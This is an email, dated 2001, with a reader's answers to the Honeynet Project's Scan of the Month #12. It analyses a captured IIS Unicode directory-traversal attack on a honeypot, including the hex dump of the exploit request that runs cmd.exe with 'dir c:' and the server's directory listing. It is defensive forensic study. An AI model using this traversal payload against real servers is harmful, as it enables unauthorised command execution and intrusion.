From raul_siles@hp.com Mon Feb 19 09:23:50 2001
Date: Mon, 19 Feb 2001 16:09:34 +0100
From: "SILES,RAUL (HP-Spain,ex1)"
To: "'project@honeynet.org'", "SILES,RAUL (HP-Spain,ex1)"
Subject: Scan of the Month - February (Scan 12)

Hi, these are the results for Scan number 12: February 2001.
- http://project.honeynet.org/scans/scan12/ -

Regards,
Raúl Siles (Spain)

-------------
#
# SCAN OF THE MONTH #12: February, 2001
#
# Challenge to see who can determine which tool was used
# and the purpose of this attack. Packet decodes using snort
# (http://www.snort.org).
#
# The packets were captured from the wild as part of the
# Honeynet Project, http://project.honeynet.org

QUESTIONS:
----------

Below is a specific probe/exploit run against our honeypot,
172.16.1.106. As you read through these signatures, the challenge
is to answer the following questions:

### QUESTION 1: What is the operating system of the honeypot, how do you know?

It is running Windows NT:

1) You can tell by reading the HTTP response sent from the Web server:
   "Server: Microsoft-IIS/4.0"

2) Also, the way the sent packet was built can give us some information:
   "/winnt/system32..."

   47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E C0 AF 2E  GET /msadc/.....
   2E 2F 2E 2E C0 AF 2E 2E 2F 2E 2E C0 AF 2E 2E 2F  ./....../....../
   77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63  winnt/system32/c
   6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2B 63 3A  md.exe?/c+dir+c:

3) Also, fingerprinting the TCP handshake can show more information:
   (http://www.enteract.com/~lspitz/traces.txt)

   # OS VERSION     PLATFORM  TTL  WINDOW       DF  TOS
   #---             --------  ---  -----------  --  ---
   Windows 9x/NT    Intel     32   5000-9000    y   0
   Windows 9x/NT    Intel     128  5000-9000    y   0    <----
   Windows 2000     Intel     128  17000-18000  y   0

   - Win: 0x2238 = 8760, and 5000 < 8760 < 9000
   - DF = y
   - TTL: 127 = 127
   - TOS: 0x0 = 0

   =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
   12/26-07:06:00.872760 172.16.1.106:80 -> 128.173.37.135:1443
   TCP TTL:127 TOS:0x0 ID:13343 IpLen:20 DgmLen:44 DF
   ***A**S* Seq: 0x1CB9F185  Ack: 0x2BDC107  Win: 0x2238  TcpLen: 24
   TCP Options (1) => MSS: 1460
   =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

### QUESTION 2: What is the name of this attack?

"The hole, known as the IIS Unicode exploit, takes advantage of a vulnerability
in some versions of Microsoft's Internet Information Server. "Exploitation of
this vulnerability is trivial," security firm Internet Security Systems stated
in an alert in October. Microsoft released a patch for the hole in August, but
many customers are still vulnerable because system administrators haven't
followed up. Apart from the hackings, the defaced HP, Compaq, AltaVista and
Intel sites had another thing in common--the operating system in question was
Windows NT and the Web server IIS/4.0. Microsoft was not immediately available
for comment."

ISS alert: http://xforce.iss.net/alerts/advise68.php
   <---- A lot of information about this exploit !!!!
- Microsoft IIS 4.0: http://www.microsoft.com/ntserver/nts/downloads/critical/q269862
- Microsoft IIS 5.0: http://www.microsoft.com/windows2000/downloads/critical/q269862

Possible formal name: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0884+

### QUESTION 3: What is the attack attempting to accomplish?

It is trying to execute a command on the remote system through the Web server.
In this example it is executing the Windows "dir" command:

   47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E C0 AF 2E  GET /msadc/.....
   2E 2F 2E 2E C0 AF 2E 2E 2F 2E 2E C0 AF 2E 2E 2F  ./....../....../
   77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63  winnt/system32/c
   6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2B 63 3A  md.exe?/c+dir+c:

We can see that it is a successful action because of the response obtained:

    Directory of c:\

   11/26/00  12:34p                     0 AUTOEXEC.BAT
   11/26/00  06:57p                   322 boot.ini
   11/26/00  12:34p                     0 CONFIG.SYS
   12/07/00  03:30p                       InetPub
   12/07/00  03:12p                       Multimedia Files
   12/20/00  05:13p            78,643,200 pagefile.sys
   12/21/00  08:59p                       Program Files
   12/21/00  08:59p                       TEMP
   12/20/00  05:14p                       WINNT
                  9 File(s)     78,643,522 bytes
                             1,779,191,808 bytes free

### QUESTION 4: How does the attack work?

This vulnerability is a variation on the common 'dot dot' directory traversal
attack. Older Web servers were vulnerable to this attack because affected Web
servers read '..' directories in URLs and allowed attackers to back out of the
web root directory. This technique allowed attackers to navigate the file
system at will. IIS and most modern Web servers have incorporated security
measures to prevent the 'dot dot' attack. These security measures deny all
queries to URLs that contain too many leading slashes or '..' characters.

The vulnerability described in this advisory bypasses these restrictions by
simply substituting a standard '/' with a UNICODE translation of a '/'
character or '\'. By appending the '..' and a UNICODE slash or backslash after
a virtual directory with execute permissions, it is possible for an attacker
to execute arbitrary commands. Attackers may execute any command via a
specially crafted HTTP query.

BONUS QUESTION: Is it possible to gain remote control of the system using this technique? If so, how?

All queries are processed under the IUSR_machine context. This context is
similar to a normal unprivileged account. However, this account is part of the
'Everyone' and 'Users' groups, which gives it access to the web directory and
most non-administrative functions. Attackers may not directly modify or delete
files owned by the Administrator, nor run commands with privilege.

BUT: Attackers may then have the ability to manipulate the appearance of the
Web site, download sensitive customer data, or upload and install backdoor
software. In this way, it could be possible to gain control of the remote
system.

SIGNATURES:
-----------

### Network Capture

-*> Snort! <*-
Version 1.7
By Martin Roesch (roesch@clark.net, www.snort.org)
Exiting...
lisa $more tmp.txt

--== Initializing Snort ==--
TCPDUMP file reading mode.
Reading network traffic from "snort-1226@0006.log" file.
snaplen = 1514

--== Initialization Complete ==--

12/26-07:06:00.871327 128.173.37.135:1443 -> 172.16.1.106:80
TCP TTL:13 TOS:0x40 ID:34723 IpLen:20 DgmLen:44 DF
******S* Seq: 0x2BDC106  Ack: 0x0  Win: 0x2000  TcpLen: 24
TCP Options (1) => MSS: 1460

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

12/26-07:06:00.872760 172.16.1.106:80 -> 128.173.37.135:1443
TCP TTL:127 TOS:0x0 ID:13343 IpLen:20 DgmLen:44 DF
***A**S* Seq: 0x1CB9F185  Ack: 0x2BDC107  Win: 0x2238  TcpLen: 24
TCP Options (1) => MSS: 1460

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

12/26-07:06:01.109979 128.173.37.135:1443 -> 172.16.1.106:80
TCP TTL:13 TOS:0x40 ID:35235 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x2BDC107  Ack: 0x1CB9F186  Win: 0x2238  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

12/26-07:06:01.155349 128.173.37.135:1443 -> 172.16.1.106:80
TCP TTL:13 TOS:0x40 ID:35491 IpLen:20 DgmLen:493 DF
***AP*** Seq: 0x2BDC107  Ack: 0x1CB9F186  Win: 0x2238  TcpLen: 20
47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E C0 AF 2E  GET /msadc/.....
2E 2F 2E 2E C0 AF 2E 2E 2F 2E 2E C0 AF 2E 2E 2F  ./....../....../
77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63  winnt/system32/c
6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2B 63 3A  md.exe?/c+dir+c:
5C 20 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65  \ HTTP/1.1..Acce
70 74 3A 20 69 6D 61 67 65 2F 67 69 66 2C 20 69  pt: image/gif, i
6D 61 67 65 2F 78 2D 78 62 69 74 6D 61 70 2C 20  mage/x-xbitmap,
69 6D 61 67 65 2F 6A 70 65 67 2C 20 69 6D 61 67  image/jpeg, imag
65 2F 70 6A 70 65 67 2C 20 61 70 70 6C 69 63 61  e/pjpeg, applica
74 69 6F 6E 2F 76 6E 64 2E 6D 73 2D 65 78 63 65  tion/vnd.ms-exce
6C 2C 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6D  l, application/m
73 77 6F 72 64 2C 20 61 70 70 6C 69 63 61 74 69  sword, applicati
6F 6E 2F 76 6E 64 2E 6D 73 2D 70 6F 77 65 72 70  on/vnd.ms-powerp
6F 69 6E 74 2C 20 2A 2F 2A 0D 0A 41 63 63 65 70  oint, */*..Accep
74 2D 4C 61 6E 67 75 61 67 65 3A 20 65 6E 2D 75  t-Language: en-u
73 0D 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69  s..Accept-Encodi
6E 67 3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74  ng: gzip, deflat
65 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D  e..User-Agent: M
6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70  ozilla/4.0 (comp
61 74 69 62 6C 65 3B 20 4D 53 49 45 20 35 2E 30  atible; MSIE 5.0
31 3B 20 57 69 6E 64 6F 77 73 20 39 35 29 0D 0A  1; Windows 95)..
48 6F 73 74 3A 20 6C 61 62 2E 77 69 72 65 74 72  Host: lib.bvxttr
69 70 2E 6E 65 74 0D 0A 43 6F 6E 6E 65 63 74 69  ip.org..Connecti
6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A  on: Keep-Alive..
43 6F 6F 6B 69 65 3A 20 41 53 50 53 45 53 53 49  Cookie: ASPSESSI
4F 4E 49 44 47 51 51 51 51 51 5A 55 3D 4B 4E 4F  ONIDGQQQQQZU=KNO
48 4D 4F 4A 41 4B 50 46 4F 50 48 4D 4C 41 50 4E  HMOJAKPFOPHMLAPN
49 46 49 46 42 0D 0A 0D 0A 41 50 4E 49 46 49 46  IFIFB....APNIFIF
42 0D 0A 0D 0A                                   B....

### Session Breakout

file ids# $more SESSION:1443-80

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Tue, 26 Dec 2000 13:05:30 GMT
Connection: close
Content-Type: application/octet-stream

 Volume in drive C has no label.
 Volume Serial Number is 8403-6A0E

 Directory of c:\

11/26/00  12:34p                     0 AUTOEXEC.BAT
11/26/00  06:57p                   322 boot.ini
11/26/00  12:34p                     0 CONFIG.SYS
12/07/00  03:30p                       InetPub
12/07/00  03:12p                       Multimedia Files
12/20/00  05:13p            78,643,200 pagefile.sys
12/21/00  08:59p                       Program Files
12/21/00  08:59p                       TEMP
12/20/00  05:14p                       WINNT
               9 File(s)     78,643,522 bytes
                          1,779,191,808 bytes free
---------------------------------------------------------------------------